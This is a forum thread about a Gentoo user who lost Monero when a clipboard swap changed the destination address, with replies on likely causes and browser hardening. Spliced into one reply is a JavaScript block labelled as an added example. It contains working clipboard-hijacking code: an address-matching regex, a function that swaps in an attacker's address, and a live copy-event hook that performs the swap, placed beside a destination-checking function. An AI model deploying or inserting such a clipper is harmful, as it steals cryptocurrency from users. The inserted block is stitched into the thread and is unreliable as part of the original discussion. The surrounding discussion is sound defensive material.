clipboard hijacking resulting in stolen crypto

aDownwardSpiral
n00b
Posts: 1
Joined: Wed Jul 17, 2024 2:54 pm


Post by aDownwardSpiral » Sat Aug 31, 2024 12:07 am

I recently lost crypto due to my clipboard somehow replacing the correct wallet address I was sending to with a very similar wallet address, presumably controlled by a hacker. I was running a fully up-to-date Gentoo box at the time of the attack, and a clamscan of my entire system resulted in 0 detected infected files. I am quite curious as to how this could have happened and would like to investigate further. Any advice on how to investigate deeper, or any theories on how this could have occurred, would be greatly appreciated.

For more details, I was using the monero-gui wallet downloaded from getmonro.org. I initially sent a very small amount of Monero to a wallet, and the funds were received with no issues. However, about 10 minutes later I decided to send a larger amount of Monero to the same wallet, but when copying and pasting the address this time, the address somehow got slightly altered, with the first 10 characters and the last 8 characters being changed. The address also changed from a 106-character integrated address to a 95-character raw address. I obviously should have triple-checked the address before sending, but I was not expecting such an occurrence.
kgdrenefort
Guru
Posts: 337
Joined: Tue Sep 19, 2023 6:10 am
Location: Somewhere in the 77


Post by kgdrenefort » Sat Aug 31, 2024 5:19 am

Hello,

ClamAV isn't for your own security on Linux; it matches against Windows viruses. Plus it's not, per se, an anti-virus but an anti-virus toolkit.

The best fails are the kind you had: human error. We all fail at some level one day and lose stuff (money, data, access...). Sorry for you. Hope it wasn't that much, though.

I really don't know how you were infected, if that's the case, but consider this always-good security advice:

- Gentoo Hardened is a plus, but I guess it wouldn't have helped you here
- Close useless services and ports, such as SSH (22), if not needed
- Avoid experimental releases of software, especially things like web browsers
- Keep up to date with GLSA alerts on Gentoo
- Avoid crypto on your main box, I guess, and use a virtual machine or another computer for such things. Something like a Raspberry Pi with a simple WM running your wallet is enough.
- Don't be paranoid and don't encrypt everything; you'll lose so much time for no extra security. It's useful if you get robbed. If I want the content that badly, I'll just cut each of your fingers until you give me that password anyway. Save me, and yourself, some time :twisted: !!!

Regards,
GASPARD DE RENEFORT Kévin
sMueggli
l33t
Posts: 627
Joined: Sat Sep 03, 2022 9:22 am


Post by sMueggli » Sat Aug 31, 2024 8:04 am

kgdrenefort wrote:ClamAV isn't for your own security on Linux, it match against Windows virus.
Please read and try to understand the ClamAV documentation first.
Hu
Administrator
Posts: 24389
Joined: Tue Mar 06, 2007 5:38 am


Post by Hu » Sat Aug 31, 2024 1:57 pm

Browsers are infamous for their terrible security practices, particularly around JavaScript. My guess would be that the OP did something in some web page that the browser interpreted as permission to update the clipboard contents, and that update replaced the good address with the bad one.

I would also assert that this is a minor failing of the tool that was used to send the cryptocurrency. In my opinion, it ought to have a mechanism to warn the user that the entered address is not one that was ever used before, and ask the user to confirm that this never-before-used address is the intended one. If it had such a mechanism, it would have triggered a warning here, since the first (good) send would not have caused the second (bad) address to be treated as trusted.
sam_
Developer
Posts: 2816
Joined: Fri Aug 14, 2020 12:33 am


Post by sam_ » Sat Aug 31, 2024 11:20 pm

I would concur with Hu's assessment here. Knowing the tabs you had open at the time would help. It's possible that perhaps one of the sites had been infected with some JS which inspected the clipboard for something which looks like a wallet address and substitutes it if it finds one.

EDIT: I should say that I also suspect it's unlikely it was outside of the browser given it could just pretend you sent it to the right address, even.
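The attack sam_ and Hu suspect, together with the never-used-before-address check Hu thinks the wallet should have made, as an added JavaScript example that is not code from this thread, from the Monero project or from monero-gui. The clipboard rewrite is modelled as a pure function so the file runs under Node; the guarded block at the end shows how a page script would hook the `copy` event to apply it. The defensive check reports the difference pattern the OP saw (changed prefix and suffix, a 106-character integrated address replaced by a 95-character standard address). Assumptions: Monero mainnet address shapes only (95 characters starting with 4 or 8, 106 characters starting with 4), no checksum validation, and every address in the block is a constructed placeholder, not a real wallet.

```javascript
// Added example (not from the thread or the Monero project): clipboard
// address substitution and the wallet-side checks that would catch it.
// Assumption: Monero mainnet address shapes only; no checksum validation.

const B58 = '[1-9A-HJ-NP-Za-km-z]'; // base58 alphabet: no 0, O, I, l
// 95 chars starting with 4 (standard) or 8 (subaddress); 106 chars starting
// with 4 (integrated address: standard address plus an 8-byte payment id).
const XMR_ADDRESS_RE = new RegExp(`\\b[48]${B58}{94}(?:${B58}{11})?\\b`, 'g');

function classifyAddress(addr) {
  if (!new RegExp(`^${B58}+$`).test(addr)) return null;
  if (addr.length === 95 && addr[0] === '4') return 'standard';
  if (addr.length === 95 && addr[0] === '8') return 'subaddress';
  if (addr.length === 106 && addr[0] === '4') return 'integrated';
  return null;
}

// Attacker side: rewrite every address-shaped token in the copied text.
function hijackClipboardText(text, attackerAddress) {
  return text.replace(XMR_ADDRESS_RE, () => attackerAddress);
}

// How two addresses differ: shared prefix/suffix lengths and a length change.
// This is the pattern the OP reported (first 10 and last 8 chars altered,
// 106-char integrated address turned into a 95-char standard address).
function describeDifference(expected, actual) {
  let prefix = 0;
  while (prefix < expected.length && prefix < actual.length &&
         expected[prefix] === actual[prefix]) prefix++;
  let suffix = 0;
  while (suffix < expected.length - prefix && suffix < actual.length - prefix &&
         expected[expected.length - 1 - suffix] === actual[actual.length - 1 - suffix]) suffix++;
  return { sharedPrefix: prefix, sharedSuffix: suffix,
           lengthChanged: expected.length !== actual.length };
}

// Defensive side: what the wallet (or the user) should check before sending.
// knownAddresses: destinations previously paid from this wallet.
// intended: the address the user meant to paste, when it is known.
function checkDestination(pasted, knownAddresses, intended = null) {
  const warnings = [];
  const kind = classifyAddress(pasted);
  if (kind === null) warnings.push('not a well-formed Monero mainnet address');
  if (!knownAddresses.has(pasted)) warnings.push('address never paid before; confirm it out of band');
  let diff = null;
  if (intended !== null && pasted !== intended) {
    diff = describeDifference(intended, pasted);
    warnings.push(`differs from intended address (shared prefix ${diff.sharedPrefix}, ` +
                  `shared suffix ${diff.sharedSuffix}, length ${intended.length} -> ${pasted.length})`);
  }
  return { kind, ok: warnings.length === 0, warnings, diff };
}

// Constructed placeholders, NOT real addresses.
const VICTIM_INTEGRATED = '4' + 'B'.repeat(105);                               // 106 chars
const ATTACKER_STANDARD = '4' + 'C'.repeat(9) + 'B'.repeat(77) + 'C'.repeat(8); // 95 chars

// Replays the OP's scenario: the first (small) payment made the real address
// "known", then the copied text is rewritten before the second payment.
function demo() {
  const copied = `pay ${VICTIM_INTEGRATED} thanks`;
  const pasted = hijackClipboardText(copied, ATTACKER_STANDARD).split(' ')[1];
  const known = new Set([VICTIM_INTEGRATED]);
  return checkDestination(pasted, known, VICTIM_INTEGRATED);
}

// Browser wiring a malicious page would use; guarded so the file runs under Node.
if (typeof document !== 'undefined') {
  document.addEventListener('copy', (e) => {
    const text = String(document.getSelection());
    e.clipboardData.setData('text/plain', hijackClipboardText(text, ATTACKER_STANDARD));
    e.preventDefault();
  });
}

console.log(JSON.stringify(demo(), null, 2));
```

The point of `checkDestination` is that the substituted address passes the "looks like a Monero address" test (it is a well-formed 95-character standard address), so format checks alone are not enough; it is the "never paid before" rule and the comparison against the intended destination that flag it. The same check applies whatever wrote the clipboard: on an X11 desktop any client can take ownership of the selection, so a clipboard manager or another local process could do what the page script does here.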
kgdrenefort
Guru
Posts: 337
Joined: Tue Sep 19, 2023 6:10 am
Location: Somewhere in the 77


Post by kgdrenefort » Sun Sep 01, 2024 7:39 am

sMueggli wrote:
kgdrenefort wrote:ClamAV isn't for your own security on Linux, it match against Windows virus.
Please read and try to understand the ClamAV documentation first.
I don't see a difference, but if you'd like to start a debate...
Bob P
Advocate
Posts: 3374
Joined: Wed Oct 20, 2004 9:15 pm
Location: USA


Post by Bob P » Sun Oct 20, 2024 9:17 pm

I may be a little extreme in the way I look at this, but IMO things have gotten to the point that, with the advent of HTML5, I just don't trust browsers anymore. I think we're at the point where spyware is built into every browser, and every web site that you visit is built using tools to share your data with anonymous third parties without you knowing what's going on. I feel like I need to fully sandbox them to protect myself.

I'm not at the point that I feel like I have to boot up Tails on bare metal every time I want to go online, but I am at the point that I won't run a browser outside of a virtual machine, where that VM gets used for the task at hand and nothing else. I don't trust Google, so I have a separate VM for everything Google-related (Google, YouTube, etc.) and it doesn't get used for anything else. I have another VM that I use for general web browsing, another one for web-based email, and another one for banking only. They all use a different browser in a different VM, and a fresh-install VM image gets copied over to a new VM for every online session and destroyed afterwards. I try not to leave any bread crumbs behind. As far as the rest of the world is concerned, it looks like I'm visiting their site after performing a brand-new bare metal installation.

I know it's extreme, but how else can you really protect yourself when the browser/internet system is designed to work against you?
yaslam
Tux's lil' helper
Posts: 103
Joined: Wed May 08, 2024 10:06 pm
Location: Scotland, UK


Post by yaslam » Tue Jun 03, 2025 9:37 am

Bob P wrote:I know it's extreme, but how else can you really protect yourself when the browser/internet system is designed to work against you?
I am a lot less extreme than you. I use LibreWolf + NoScript + uBlock Origin to minimize tracking. LibreWolf is configured to clear cookies and site data every time it is closed and has various anti-fingerprinting options enabled (sure, I have to sign in each time I restart the browser, but he who sacrifices privacy for convenience deserves neither). NoScript is for preventing JavaScript and other things from running on a web page, but per domain, so I can allow JavaScript for domains that need it. uBlock Origin is an ad blocker which helps more with the trackers.

I have found that with NoScript enabled, some websites that would otherwise have tens or hundreds of ad domains and trackers showing up in uBlock Origin have none. This is because JS is being blocked, preventing garbage analytics companies from running their JS in my browser. It is great occasionally seeing a website that works with only CSS and HTML.
Last edited by yaslam on Sun Jun 08, 2025 1:53 pm, edited 1 time in total.
zen_desu
Guru
Posts: 501
Joined: Fri Oct 25, 2024 3:14 pm
Location: your area


Post by zen_desu » Tue Jun 03, 2025 3:34 pm

If you're very concerned it can help to have a hardware wallet so you can confirm transactions on a physical, likely not compromised device instead of trusting what you see on screen.